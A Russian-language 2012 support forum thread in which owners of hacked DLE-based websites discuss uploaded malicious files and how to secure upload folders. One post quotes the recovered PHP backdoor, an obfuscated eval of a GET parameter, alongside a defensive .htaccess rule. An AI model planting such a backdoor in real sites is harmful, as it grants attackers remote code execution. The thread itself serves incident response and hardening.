karpel 0 Опубликовано: 1 марта 2012 Рассказать Опубликовано: 1 марта 2012 (изменено) Добрый день, ко мне на сайт залили вредоносный код в папку /uploads/fotos/iframe.html о чем меня благополучно уведомил Google. Каким образом удалось это сделать? Установлена лицензионная DLE 9.5 Изменено 1 марта 2012 пользователем karpel Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 1 марта 2012 Рассказать Опубликовано: 1 марта 2012 Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован. Цитата Ссылка на сообщение Поделиться на других сайтах
karpel 0 Опубликовано: 1 марта 2012 Рассказать Опубликовано: 1 марта 2012 Автор Сайт softik.ws Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 985 Опубликовано: 1 марта 2012 Рассказать Опубликовано: 1 марта 2012 1. Убирайте с сайта сомнительные PHP партнерки со скрипта, которые у вас стоят. И другие строронние модули. 2. Также читайте темы: http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe Цитата Ссылка на сообщение Поделиться на других сайтах
madmike3 0 Опубликовано: 3 марта 2012 Рассказать Опубликовано: 3 марта 2012 Имею аналогичную проблему c DLE 8.5. Сайт http://marketopedia.ru - залиты "чужие" файлы phtml и php в папки uploads/fotos/ uploads/posts/thumbs/ файл phtml в этой папке содержал такой код (похоже как раз на injections): <? echo eval($_GET[base64_decode('Yw==')]);?> второй был уже сам shell, через который дальше вставляли свой код на страницы, могу прислать почтой (как txt). Через шелл добавляли в БД в начало каждой новости (короткой и полной) вызов java-скрипта с другого сайта. Поменял пароли ftp и БД, закрыл все вложенные папки upolads файлами .htacces примерно следующего содержания: <Files ~ "^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)"> Order allow,deny Deny from all </Files> RemoveType .php3 .php .shtml .phtml .php4 .php5 .php6 .cgi .pl Странно, что по умолчанию в образе движка эти папки не были закрыты htaccess. Запретил редактирование шаблона из админки (правами папки). Что еще можно сделать для защиты? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 3 марта 2012 Рассказать Опубликовано: 3 марта 2012 Что еще можно сделать для защиты? Обновиться до версии 9.5Следить за http://dle-news.ru/bags/ Цитата Ссылка на сообщение Поделиться на других сайтах
madmike3 0 Опубликовано: 3 марта 2012 Рассказать Опубликовано: 3 марта 2012 Обновиться до версии 9.5 Следить за http://dle-news.ru/bags/ Обновляться платно мне смысла нет - для этого сайта даже функционал 8.5 избыточен. В районе нового года все обновления безопасности накатывал, сайт поломали позже. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 985 Опубликовано: 3 марта 2012 Рассказать Опубликовано: 3 марта 2012 madmike3, А кто вам сказал что вам залили через DLE, а например не через http://marketopedia.ru/forum/ или например не через уязвимый на вашем сервере https://marketopedia.ru/myadmin/ который у вас реально уязвим и можно загружать шеллы http://www.phpmyadmin.net/home_page/security/ Иногда я просто удивляюсь людям, при посещении просто их сайта я могу сказать несколько уязвимостей на сайте без DLE. А они думают что у них проблема в том что не было .htaccess, этот файл блокирует запуск скриптов а не заливку. Устранять нужно причину проблемы а не придумывать какие то обходные пути. Цитата Ссылка на сообщение Поделиться на других сайтах
Japonec 8 Опубликовано: 3 марта 2012 Рассказать Опубликовано: 3 марта 2012 Форум тот, это жесть полная , снеси его пока непозно. Цитата Ссылка на сообщение Поделиться на других сайтах
madmike3 0 Опубликовано: 4 марта 2012 Рассказать Опубликовано: 4 марта 2012 (изменено) Чем этот форум заменить? LogicBoard лучше? А кто вам сказал что вам залили через DLE, а например не через ... Иногда я просто удивляюсь людям, при посещении просто их сайта я могу сказать несколько уязвимостей на сайте без DLE. А они думают что у них проблема в том что не было .htaccess, этот файл блокирует запуск скриптов а не заливку. Устранять нужно причину проблемы а не придумывать какие то обходные пути. Видимо, это удивление как раз и помешало вам заметить, что я нигде не писал, что шелл залит именно через DLE. Я пытаюсь разобраться, как мне обезопасить сайт на DLE. Если обратился не по адресу - извините, думал, что вам эта проблема может быть интересна. Кстати, еще такой момент - у меня почему-то при сохранении образа базы через админку стало создаваться сначала два, а сейчас - три одинаковых файла. Это нормально? Изменено 4 марта 2012 пользователем madmike3 Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 4 марта 2012 Рассказать Опубликовано: 4 марта 2012 что я нигде не писал, что шелл залит именно через DLE и тем не менее ты пришел на форум поддержки ДЛЕ. Цитата Ссылка на сообщение Поделиться на других сайтах
madmike3 0 Опубликовано: 4 марта 2012 Рассказать Опубликовано: 4 марта 2012 и тем не менее ты пришел на форум поддержки ДЛЕ. Если смысл предложения, следующего за процитированным, от вас ускользает - считайте, что это совпадение. Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 4 марта 2012 Рассказать Опубликовано: 4 марта 2012 суть в том, ты пришел на форум ДЛЕ с проблемой взлома, и в сообщении не указал никаких других сторонних скриптов, установленных на сервере. логично и естественно предположить, что ты грешишь на дле. что, собственно, подтверждают сообщения участников форума. а потом начинаешь еще и язвить. попустись немного, ок? и свой тонкий юмор оставь для подружек. Цитата Ссылка на сообщение Поделиться на других сайтах
madmike3 0 Опубликовано: 4 марта 2012 Рассказать Опубликовано: 4 марта 2012 логично и естественно предположить, что ты грешишь на дле Если есть сайт, который взломали (мне лично пока неизвестно, как именно - админы сервера тоже подключены к поискам) - логично и естественно за консультацией обратиться в т.ч. к поставщику использованной платной CMS. Нет? Я ни одного слова плохого не написал про саму CMS, лишь спросил, как можно обезопасить сайт, работающий на ней. Более того - в посте, на который вы ответили, я очень конкретно объяснил, зачем я именно сюда пришел. Поэтому ваш следующий пост "и тем не менее ты пришел на форум поддержки ДЛЕ" мне показался следствием невнимательного прочтения моего сообщения. Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 4 марта 2012 Рассказать Опубликовано: 4 марта 2012 ладно, все в порядке из форумов рекомендовал бы IPB. да платный, за то крутой функционал и за ним хорошо следят разрабы Цитата Ссылка на сообщение Поделиться на других сайтах
madmike3 0 Опубликовано: 4 марта 2012 Рассказать Опубликовано: 4 марта 2012 IPB не просто платный - он дорогой. Кроме того, чем нравится именно dle-forum - он использует шаблон сайта (встраивается в область контента), что для моего проекта (где форум не основное) более желательный вариант. Цитата Ссылка на сообщение Поделиться на других сайтах
Japonec 8 Опубликовано: 5 марта 2012 Рассказать Опубликовано: 5 марта 2012 (изменено) ладно, все в порядке из форумов рекомендовал бы IPB. да платный, за то крутой функционал и за ним хорошо следят разрабы ИБР (Российское представительство) похоже ёк, у меня лиц на ИПБ и похоже 3.3 новую приидётся покупать за ново у америкосов. К ипб+дле есть интегра у Калиостро (15 бачей всего) Кстати ипб тут стоит (шаблон от Фисаны) IPB не просто платный - он дорогой. Кроме того, чем нравится именно dle-forum - он использует шаблон сайта (встраивается в область контента), что для моего проекта (где форум не основное) более желательный вариант. Я не чего не имею против ShVad, всёж как ни как старается, но всёж dle-forum пока далёк от даже логикбоард и других сравнительно молодых скриптов. Изменено 5 марта 2012 пользователем Japonec Цитата Ссылка на сообщение Поделиться на других сайтах
madmike3 0 Опубликовано: 6 марта 2012 Рассказать Опубликовано: 6 марта 2012 (изменено) LB я сейчас на другом проекте тестирую. Если проблем не будет - заменю на него. IPB у меня тоже есть на еще одном проекте, возможности хорошо знаю, но покупать для этого сайта не готов, да и интеграция (не только синхронизация аккаунтов) потребует много усилий. Изменено 6 марта 2012 пользователем madmike3 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.